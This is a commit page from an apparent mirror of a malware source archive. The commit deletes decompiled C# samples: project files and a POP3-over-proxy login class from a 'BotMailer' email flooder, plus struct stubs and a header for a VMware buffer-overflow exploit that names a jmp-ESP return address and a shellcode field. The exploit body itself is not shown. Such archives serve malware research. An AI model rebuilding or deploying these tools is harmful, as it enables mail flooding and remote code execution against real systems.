ch0ic3/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2024-12-18 09:26:09 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity

mov

Browse Source 
will be repaired
This commit is contained in:
vxunderground 2022-08-21 03:53:58 -05:00
parent 9cdce45934
commit e2d9bb12d0
248 changed files with 0 additions and 27430 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

13
MSIL/Email-Flooder/Win32/B/Email-Flooder.Win32.BotMailer-f647edd898ebc2e8aa4b3983ed667932e2084b937bd11403e995db4e208227b9/AssemblyInfo.cs
View File

@ -1,13 +0,0 @@
using System;
using System.Reflection;
using System.Runtime.InteropServices;
[assembly: AssemblyCompany("")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyProduct("")]
[assembly: AssemblyTitle("")]
[assembly: Guid("97EC1077-3505-488C-A2C4-AA88533ADB07")]
[assembly: CLSCompliant(true)]
[assembly: AssemblyCopyright("")]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyVersion("1.0.1384.33852")]

49
MSIL/Email-Flooder/Win32/B/Email-Flooder.Win32.BotMailer-f647edd898ebc2e8aa4b3983ed667932e2084b937bd11403e995db4e208227b9/Email-Flooder.Win32.BotMailer.csproj
View File

@ -1,49 +0,0 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Email-Flooder.Win32.BotMailer-f647edd898ebc2e8aa4b3983ed667932e2084b937bd11403e995db4e208227b9.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{4350EF96-A12A-48CB-82B7-ADE3688C1245}</ProjectGuid>
<OutputType>WinExe</OutputType>
<AssemblyName>Botmailer Lite Speed</AssemblyName>
<ApplicationVersion>1.0.1384.33852</ApplicationVersion>
<RootNamespace>WindowsApplication17</RootNamespace>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="Microsoft.VisualBasic" />
<Reference Include="System" />
<Reference Include="System.Data" />
<Reference Include="System.Drawing" />
<Reference Include="System.Windows.Forms" />
<Reference Include="System.Xml" />
</ItemGroup>
<ItemGroup>
<Compile Include="POP.cs" />
<Compile Include="Form1.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<ItemGroup>
<EmbeddedResource Include="Form1.resx" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>

20
MSIL/Email-Flooder/Win32/B/Email-Flooder.Win32.BotMailer-f647edd898ebc2e8aa4b3983ed667932e2084b937bd11403e995db4e208227b9/Email-Flooder.Win32.BotMailer.sln
View File

@ -1,20 +0,0 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Botmailer Lite Speed", "Email-Flooder.Win32.BotMailer-f647edd898ebc2e8aa4b3983ed667932e2084b937bd11403e995db4e208227b9.csproj", "{4350EF96-A12A-48CB-82B7-ADE3688C1245}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{4350EF96-A12A-48CB-82B7-ADE3688C1245}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{4350EF96-A12A-48CB-82B7-ADE3688C1245}.Debug|Any CPU.Build.0 = Debug|Any CPU
{4350EF96-A12A-48CB-82B7-ADE3688C1245}.Release|Any CPU.ActiveCfg = Release|Any CPU
{4350EF96-A12A-48CB-82B7-ADE3688C1245}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal

4872
MSIL/Email-Flooder/Win32/B/Email-Flooder.Win32.BotMailer-f647edd898ebc2e8aa4b3983ed667932e2084b937bd11403e995db4e208227b9/Form1.cs
View File

File diff suppressed because it is too large Load Diff

480
MSIL/Email-Flooder/Win32/B/Email-Flooder.Win32.BotMailer-f647edd898ebc2e8aa4b3983ed667932e2084b937bd11403e995db4e208227b9/Form1.resx
View File

File diff suppressed because one or more lines are too long

140
MSIL/Email-Flooder/Win32/B/Email-Flooder.Win32.BotMailer-f647edd898ebc2e8aa4b3983ed667932e2084b937bd11403e995db4e208227b9/POP.cs
View File

@ -1,140 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: WindowsApplication17.POP
// Assembly: Botmailer Lite Speed, Version=1.0.1384.33852, Culture=neutral, PublicKeyToken=null
// MVID: 88833486-5004-4FA6-992A-B27BD1BCD279
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Email-Flooder.Win32.BotMailer-f647edd898ebc2e8aa4b3983ed667932e2084b937bd11403e995db4e208227b9.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.Net.Sockets;
using System.Text;
namespace WindowsApplication17
{
public class POP
{
private string _proxy;
private string _proxyport;
private string _server;
private int _port;
private string _Username;
private string _Password;
private NetworkStream ns;
private TcpClient client;
public POP(string server, int port)
{
this._port = 110;
this.client = new TcpClient();
this._server = server;
this._port = port;
}
public POP(
string server,
int port,
string username,
string password,
string PROXY,
string Proxyport)
{
this._port = 110;
this.client = new TcpClient();
this._proxy = PROXY;
this._proxyport = Proxyport;
this._Username = username;
this._Password = password;
this._server = server;
this._port = port;
}
public string proxyport
{
get => this._proxyport;
set => this._proxyport = value;
}
public string proxy
{
get => this._proxy;
set => this._proxy = value;
}
public string POPServer
{
get => this._server;
set => this._server = value;
}
public string username
{
get => this._Username;
set => this._Username = value;
}
public string password
{
get => this._Password;
set => this._Password = value;
}
public int Port
{
get => this._port;
set => this._port = value;
}
public object Open()
{
string[] strArray = this._proxy.ToString().Split(':');
string str1 = strArray[0] + ", " + strArray[1];
TcpClient tcpClient = new TcpClient();
tcpClient.Connect(strArray[0], IntegerType.FromString(strArray[1]));
NetworkStream stream = tcpClient.GetStream();
byte[] bytes1 = Encoding.ASCII.GetBytes("CONNECT " + this._server + ":" + StringType.FromInteger(this._port) + " HTTP/1.1" + "\r\n" + "Host: " + this._server + ":" + StringType.FromInteger(this._port) + "\r\n" + "\r\n");
stream.Write(bytes1, 0, bytes1.Length);
byte[] numArray = new byte[checked (tcpClient.ReceiveBufferSize + 1)];
stream.Read(numArray, 0, tcpClient.ReceiveBufferSize);
Console.WriteLine("POP Return 1:" + Encoding.ASCII.GetString(numArray));
byte[] bytes2 = Encoding.ASCII.GetBytes("USER " + this._Username + "\r\n");
stream.Write(bytes2, 0, bytes2.Length);
stream.Read(numArray, 0, tcpClient.ReceiveBufferSize);
string str2 = Encoding.ASCII.GetString(numArray);
if (StringType.StrCmp(str2.Substring(0, 3), "+OK", false) == 0)
{
Console.WriteLine("Pop Return 2:" + str2);
byte[] bytes3 = Encoding.ASCII.GetBytes("PASS " + this._Password + "\r\n");
stream.Write(bytes3, 0, bytes3.Length);
stream.Read(numArray, 0, tcpClient.ReceiveBufferSize);
string str3 = Encoding.ASCII.GetString(numArray);
Console.WriteLine("Pop3 Returndata 3:" + str3);
if (StringType.StrCmp(str3.Substring(0, 3), "+OK", false) == 0)
{
byte[] bytes4 = Encoding.ASCII.GetBytes("STAT\r\n");
stream.Write(bytes4, 0, bytes4.Length);
stream.Read(numArray, 0, tcpClient.ReceiveBufferSize);
Console.WriteLine("Pop3 Returndata 4:" + Encoding.ASCII.GetString(numArray));
byte[] bytes5 = Encoding.ASCII.GetBytes("RETR 1\r\n");
stream.Write(bytes5, 0, bytes5.Length);
stream.Read(numArray, 0, tcpClient.ReceiveBufferSize);
Console.WriteLine("Pop3 Returndata 5:" + Encoding.ASCII.GetString(numArray));
byte[] bytes6 = Encoding.ASCII.GetBytes("QUIT\r\n");
stream.Write(bytes6, 0, bytes6.Length);
stream.Read(numArray, 0, tcpClient.ReceiveBufferSize);
Console.WriteLine("Pop3 Returndata 6:" + Encoding.ASCII.GetString(numArray));
}
else
{
int num = (int) Interaction.MsgBox((object) "Username/Password Error");
}
}
else
{
int num1 = (int) Interaction.MsgBox((object) "Error connecting to POP");
}
object obj;
return obj;
}
}
}

14
MSIL/Exploit/Win32/V/Exploit.Win32.VMWare-bf2f952a8a998a86b2dd1280b7dafa453f57fa370cefde8e201bff8c6300edbd/$ArrayType$0x0e6cb2b2.cs
View File

@ -1,14 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: $ArrayType$0x0e6cb2b2
// Assembly: vmware, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 232CA0DF-503A-41D7-ADB3-576C6CA1BE9F
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Exploit.Win32.VMWare-bf2f952a8a998a86b2dd1280b7dafa453f57fa370cefde8e201bff8c6300edbd.exe
using Microsoft.VisualC;
using System.Runtime.InteropServices;
[DebugInfoInPDB]
[StructLayout(LayoutKind.Explicit, Size = 33, Pack = 1)]
internal struct \u0024ArrayType\u00240x0e6cb2b2
{
}

14
MSIL/Exploit/Win32/V/Exploit.Win32.VMWare-bf2f952a8a998a86b2dd1280b7dafa453f57fa370cefde8e201bff8c6300edbd/$ArrayType$0x1d30cc0a.cs
View File

@ -1,14 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: $ArrayType$0x1d30cc0a
// Assembly: vmware, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 232CA0DF-503A-41D7-ADB3-576C6CA1BE9F
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Exploit.Win32.VMWare-bf2f952a8a998a86b2dd1280b7dafa453f57fa370cefde8e201bff8c6300edbd.exe
using Microsoft.VisualC;
using System.Runtime.InteropServices;
[DebugInfoInPDB]
[StructLayout(LayoutKind.Explicit, Size = 3, Pack = 1)]
internal struct \u0024ArrayType\u00240x1d30cc0a
{
}

14
MSIL/Exploit/Win32/V/Exploit.Win32.VMWare-bf2f952a8a998a86b2dd1280b7dafa453f57fa370cefde8e201bff8c6300edbd/$ArrayType$0x24ec09a1.cs
View File

@ -1,14 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: $ArrayType$0x24ec09a1
// Assembly: vmware, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 232CA0DF-503A-41D7-ADB3-576C6CA1BE9F
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Exploit.Win32.VMWare-bf2f952a8a998a86b2dd1280b7dafa453f57fa370cefde8e201bff8c6300edbd.exe
using Microsoft.VisualC;
using System.Runtime.InteropServices;
[DebugInfoInPDB]
[StructLayout(LayoutKind.Explicit, Size = 141, Pack = 1)]
internal struct \u0024ArrayType\u00240x24ec09a1
{
}

14
MSIL/Exploit/Win32/V/Exploit.Win32.VMWare-bf2f952a8a998a86b2dd1280b7dafa453f57fa370cefde8e201bff8c6300edbd/$ArrayType$0x3a9112db.cs
View File

@ -1,14 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: $ArrayType$0x3a9112db
// Assembly: vmware, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 232CA0DF-503A-41D7-ADB3-576C6CA1BE9F
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Exploit.Win32.VMWare-bf2f952a8a998a86b2dd1280b7dafa453f57fa370cefde8e201bff8c6300edbd.exe
using Microsoft.VisualC;
using System.Runtime.InteropServices;
[DebugInfoInPDB]
[StructLayout(LayoutKind.Explicit, Size = 61, Pack = 1)]
internal struct \u0024ArrayType\u00240x3a9112db
{
}

14
MSIL/Exploit/Win32/V/Exploit.Win32.VMWare-bf2f952a8a998a86b2dd1280b7dafa453f57fa370cefde8e201bff8c6300edbd/$ArrayType$0x4b6a6b8c.cs
View File

@ -1,14 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: $ArrayType$0x4b6a6b8c
// Assembly: vmware, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 232CA0DF-503A-41D7-ADB3-576C6CA1BE9F
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Exploit.Win32.VMWare-bf2f952a8a998a86b2dd1280b7dafa453f57fa370cefde8e201bff8c6300edbd.exe
using Microsoft.VisualC;
using System.Runtime.InteropServices;
[DebugInfoInPDB]
[StructLayout(LayoutKind.Explicit, Size = 5, Pack = 1)]
internal struct \u0024ArrayType\u00240x4b6a6b8c
{
}

14
MSIL/Exploit/Win32/V/Exploit.Win32.VMWare-bf2f952a8a998a86b2dd1280b7dafa453f57fa370cefde8e201bff8c6300edbd/$ArrayType$0x5bb2c15a.cs
View File

@ -1,14 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: $ArrayType$0x5bb2c15a
// Assembly: vmware, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 232CA0DF-503A-41D7-ADB3-576C6CA1BE9F
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Exploit.Win32.VMWare-bf2f952a8a998a86b2dd1280b7dafa453f57fa370cefde8e201bff8c6300edbd.exe
using Microsoft.VisualC;
using System.Runtime.InteropServices;
[DebugInfoInPDB]
[StructLayout(LayoutKind.Explicit, Size = 15, Pack = 1)]
internal struct \u0024ArrayType\u00240x5bb2c15a
{
}

14
MSIL/Exploit/Win32/V/Exploit.Win32.VMWare-bf2f952a8a998a86b2dd1280b7dafa453f57fa370cefde8e201bff8c6300edbd/$ArrayType$0x5efdd7df.cs
View File

@ -1,14 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: $ArrayType$0x5efdd7df
// Assembly: vmware, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 232CA0DF-503A-41D7-ADB3-576C6CA1BE9F
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Exploit.Win32.VMWare-bf2f952a8a998a86b2dd1280b7dafa453f57fa370cefde8e201bff8c6300edbd.exe
using Microsoft.VisualC;
using System.Runtime.InteropServices;
[DebugInfoInPDB]
[StructLayout(LayoutKind.Explicit, Size = 65, Pack = 1)]
internal struct \u0024ArrayType\u00240x5efdd7df
{
}

14
MSIL/Exploit/Win32/V/Exploit.Win32.VMWare-bf2f952a8a998a86b2dd1280b7dafa453f57fa370cefde8e201bff8c6300edbd/$ArrayType$0x6047384f.cs
View File

@ -1,14 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: $ArrayType$0x6047384f
// Assembly: vmware, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 232CA0DF-503A-41D7-ADB3-576C6CA1BE9F
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Exploit.Win32.VMWare-bf2f952a8a998a86b2dd1280b7dafa453f57fa370cefde8e201bff8c6300edbd.exe
using Microsoft.VisualC;
using System.Runtime.InteropServices;
[DebugInfoInPDB]
[StructLayout(LayoutKind.Explicit, Size = 6, Pack = 1)]
internal struct \u0024ArrayType\u00240x6047384f
{
}

14
MSIL/Exploit/Win32/V/Exploit.Win32.VMWare-bf2f952a8a998a86b2dd1280b7dafa453f57fa370cefde8e201bff8c6300edbd/$ArrayType$0x795c090e.cs
View File

@ -1,14 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: $ArrayType$0x795c090e
// Assembly: vmware, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 232CA0DF-503A-41D7-ADB3-576C6CA1BE9F
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Exploit.Win32.VMWare-bf2f952a8a998a86b2dd1280b7dafa453f57fa370cefde8e201bff8c6300edbd.exe
using Microsoft.VisualC;
using System.Runtime.InteropServices;
[DebugInfoInPDB]
[StructLayout(LayoutKind.Explicit, Size = 7, Pack = 1)]
internal struct \u0024ArrayType\u00240x795c090e
{
}

14
MSIL/Exploit/Win32/V/Exploit.Win32.VMWare-bf2f952a8a998a86b2dd1280b7dafa453f57fa370cefde8e201bff8c6300edbd/$ArrayType$0x8011bcc8.cs
View File

@ -1,14 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: $ArrayType$0x8011bcc8
// Assembly: vmware, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 232CA0DF-503A-41D7-ADB3-576C6CA1BE9F
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Exploit.Win32.VMWare-bf2f952a8a998a86b2dd1280b7dafa453f57fa370cefde8e201bff8c6300edbd.exe
using Microsoft.VisualC;
using System.Runtime.InteropServices;
[DebugInfoInPDB]
[StructLayout(LayoutKind.Explicit, Size = 4096, Pack = 1)]
internal struct \u0024ArrayType\u00240x8011bcc8
{
}

14
MSIL/Exploit/Win32/V/Exploit.Win32.VMWare-bf2f952a8a998a86b2dd1280b7dafa453f57fa370cefde8e201bff8c6300edbd/$ArrayType$0x8b5292b5.cs
View File

@ -1,14 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: $ArrayType$0x8b5292b5
// Assembly: vmware, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 232CA0DF-503A-41D7-ADB3-576C6CA1BE9F
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Exploit.Win32.VMWare-bf2f952a8a998a86b2dd1280b7dafa453f57fa370cefde8e201bff8c6300edbd.exe
using Microsoft.VisualC;
using System.Runtime.InteropServices;
[DebugInfoInPDB]
[StructLayout(LayoutKind.Explicit, Size = 4, Pack = 1)]
internal struct \u0024ArrayType\u00240x8b5292b5
{
}

14
MSIL/Exploit/Win32/V/Exploit.Win32.VMWare-bf2f952a8a998a86b2dd1280b7dafa453f57fa370cefde8e201bff8c6300edbd/$ArrayType$0xf1cc4cbd.cs
View File

@ -1,14 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: $ArrayType$0xf1cc4cbd
// Assembly: vmware, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 232CA0DF-503A-41D7-ADB3-576C6CA1BE9F
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Exploit.Win32.VMWare-bf2f952a8a998a86b2dd1280b7dafa453f57fa370cefde8e201bff8c6300edbd.exe
using Microsoft.VisualC;
using System.Runtime.InteropServices;
[DebugInfoInPDB]
[StructLayout(LayoutKind.Explicit, Size = 49, Pack = 1)]
internal struct \u0024ArrayType\u00240xf1cc4cbd
{
}

14
MSIL/Exploit/Win32/V/Exploit.Win32.VMWare-bf2f952a8a998a86b2dd1280b7dafa453f57fa370cefde8e201bff8c6300edbd/$ArrayType$0xfec415c1.cs
View File

@ -1,14 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: $ArrayType$0xfec415c1
// Assembly: vmware, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 232CA0DF-503A-41D7-ADB3-576C6CA1BE9F
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Exploit.Win32.VMWare-bf2f952a8a998a86b2dd1280b7dafa453f57fa370cefde8e201bff8c6300edbd.exe
using Microsoft.VisualC;
using System.Runtime.InteropServices;
[DebugInfoInPDB]
[StructLayout(LayoutKind.Explicit, Size = 8, Pack = 1)]
internal struct \u0024ArrayType\u00240xfec415c1
{
}

5
MSIL/Exploit/Win32/V/Exploit.Win32.VMWare-bf2f952a8a998a86b2dd1280b7dafa453f57fa370cefde8e201bff8c6300edbd/AssemblyInfo.cs
View File

@ -1,5 +0,0 @@
using System.Reflection;
using System.Security.Permissions;
[assembly: AssemblyVersion("0.0.0.0")]
[assembly: PermissionSet(SecurityAction.RequestMinimum, XML = "<PermissionSet class=\"System.Security.PermissionSet\"\r\n version=\"1\">\r\n <IPermission class=\"System.Security.Permissions.SecurityPermission, mscorlib, Version=1.0.3300.0, Culture=neutral, PublicKeyToken=b77a5c561934e089\"\r\n version=\"1\"\r\n Flags=\"SkipVerification\"/>\r\n</PermissionSet>\r\n")]

57
MSIL/Exploit/Win32/V/Exploit.Win32.VMWare-bf2f952a8a998a86b2dd1280b7dafa453f57fa370cefde8e201bff8c6300edbd/Exploit.Win32.VMWare.csproj
View File

@ -1,57 +0,0 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Exploit.Win32.VMWare-bf2f952a8a998a86b2dd1280b7dafa453f57fa370cefde8e201bff8c6300edbd.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{5F94B076-9763-47D6-A095-7301B4551DEB}</ProjectGuid>
<OutputType>Exe</OutputType>
<AssemblyName>vmware</AssemblyName>
<ApplicationVersion>0.0.0.0</ApplicationVersion>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
<AllowUnsafeBlocks>true</AllowUnsafeBlocks>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
<AllowUnsafeBlocks>true</AllowUnsafeBlocks>
</PropertyGroup>
<ItemGroup>
<Reference Include="Microsoft.VisualC" />
</ItemGroup>
<ItemGroup>
<Compile Include="_003CModule_003E.cs" />
<Compile Include="$ArrayType$0x5efdd7df.cs" />
<Compile Include="$ArrayType$0xf1cc4cbd.cs" />
<Compile Include="$ArrayType$0x0e6cb2b2.cs" />
<Compile Include="$ArrayType$0x3a9112db.cs" />
<Compile Include="$ArrayType$0x5bb2c15a.cs" />
<Compile Include="$ArrayType$0x1d30cc0a.cs" />
<Compile Include="$ArrayType$0x6047384f.cs" />
<Compile Include="$ArrayType$0xfec415c1.cs" />
<Compile Include="$ArrayType$0x4b6a6b8c.cs" />
<Compile Include="$ArrayType$0x795c090e.cs" />
<Compile Include="WSAData.cs" />
<Compile Include="sockaddr_in.cs" />
<Compile Include="$ArrayType$0x8011bcc8.cs" />
<Compile Include="sockaddr.cs" />
<Compile Include="$ArrayType$0x8b5292b5.cs" />
<Compile Include="$ArrayType$0x24ec09a1.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>

20
MSIL/Exploit/Win32/V/Exploit.Win32.VMWare-bf2f952a8a998a86b2dd1280b7dafa453f57fa370cefde8e201bff8c6300edbd/Exploit.Win32.VMWare.sln
View File

@ -1,20 +0,0 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "vmware", "Exploit.Win32.VMWare-bf2f952a8a998a86b2dd1280b7dafa453f57fa370cefde8e201bff8c6300edbd.csproj", "{5F94B076-9763-47D6-A095-7301B4551DEB}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{5F94B076-9763-47D6-A095-7301B4551DEB}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{5F94B076-9763-47D6-A095-7301B4551DEB}.Debug|Any CPU.Build.0 = Debug|Any CPU
{5F94B076-9763-47D6-A095-7301B4551DEB}.Release|Any CPU.ActiveCfg = Release|Any CPU
{5F94B076-9763-47D6-A095-7301B4551DEB}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal

15
MSIL/Exploit/Win32/V/Exploit.Win32.VMWare-bf2f952a8a998a86b2dd1280b7dafa453f57fa370cefde8e201bff8c6300edbd/WSAData.cs
View File

@ -1,15 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: WSAData
// Assembly: vmware, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 232CA0DF-503A-41D7-ADB3-576C6CA1BE9F
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Exploit.Win32.VMWare-bf2f952a8a998a86b2dd1280b7dafa453f57fa370cefde8e201bff8c6300edbd.exe
using Microsoft.VisualC;
using System.Runtime.InteropServices;
[DebugInfoInPDB]
[MiscellaneousBits(1)]
[StructLayout(LayoutKind.Sequential, Size = 400, Pack = 1)]
internal struct WSAData
{
}

206
MSIL/Exploit/Win32/V/Exploit.Win32.VMWare-bf2f952a8a998a86b2dd1280b7dafa453f57fa370cefde8e201bff8c6300edbd/_003CModule_003E.cs
View File

@ -1,206 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: <Module>
// Assembly: vmware, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 232CA0DF-503A-41D7-ADB3-576C6CA1BE9F
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Exploit.Win32.VMWare-bf2f952a8a998a86b2dd1280b7dafa453f57fa370cefde8e201bff8c6300edbd.exe
using System;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
using System.Security;
internal class \u003CModule\u003E
{
public static \u0024ArrayType\u00240x5efdd7df \u003F\u003F_C\u0040_0EB\u0040NAMDAADC\u0040\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u0040;
public static \u0024ArrayType\u00240xf1cc4cbd \u003F\u003F_C\u0040_0DB\u0040ICPJLJMF\u0040VMware\u003F5Overflow\u003F5Test\u003F5v1\u003F40\u003F5Writte\u0040;
public static \u0024ArrayType\u00240x0e6cb2b2 \u003F\u003F_C\u0040_0CB\u0040FOEJOKAI\u0040Fixed\u003F5by\u003F5agathos\u003F5\u003F\u0024DMeth0\u003F\u0024EAlist\u003F4ru\u003F\u0024DO\u003F6\u0040;
public static \u0024ArrayType\u00240x3a9112db \u003F\u003F_C\u0040_0DN\u0040JGNDLFBF\u0040Usage\u003F3\u003F5vmware\u003F4exe\u003F5\u003F\u0024DMIP\u003F\u0024DO\u003F5\u003F\u0024DMPORT\u003F\u0024DO\u003F5\u003F\u0024DMu\u0040;
public static \u0024ArrayType\u00240x5bb2c15a \u003F\u003F_C\u0040_0P\u0040JJDDLOF\u0040connect\u003F5error\u003F6\u003F\u0024AA\u0040;
public static \u0024ArrayType\u00240x1d30cc0a \u003F\u003F_C\u0040_02DKCKIIND\u0040\u003F\u0024CFs\u003F\u0024AA\u0040;
public static \u0024ArrayType\u00240x6047384f \u003F\u003F_C\u0040_05DLLLAEHA\u0040USER\u003F5\u003F\u0024AA\u0040;
public static \u0024ArrayType\u00240x1d30cc0a \u003F\u003F_C\u0040_02PCIJFNDE\u0040\u003F\u0024AN\u003F6\u003F\u0024AA\u0040;
public static \u0024ArrayType\u00240x6047384f \u003F\u003F_C\u0040_05FOGDDFF\u0040PASS\u003F5\u003F\u0024AA\u0040;
public static \u0024ArrayType\u00240xfec415c1 \u003F\u003F_C\u0040_07CJLPCIKB\u0040GLOBAL\u003F5\u003F\u0024AA\u0040;
public static \u0024ArrayType\u00240x4b6a6b8c \u003F\u003F_C\u0040_04JKBAFAPB\u0040\u003F\u0024JA\u003F\u0024JAXh\u003F\u0024AA\u0040;
public static \u0024ArrayType\u00240x795c090e \u003F\u003F_C\u0040_06MCOPMGCE\u0040Done\u003F\u0024CB\u003F6\u003F\u0024AA\u0040;
public static \u0024ArrayType\u00240x8b5292b5 Jmp_ESP_XP_Eng;
public static \u0024ArrayType\u00240x24ec09a1 shellcode;
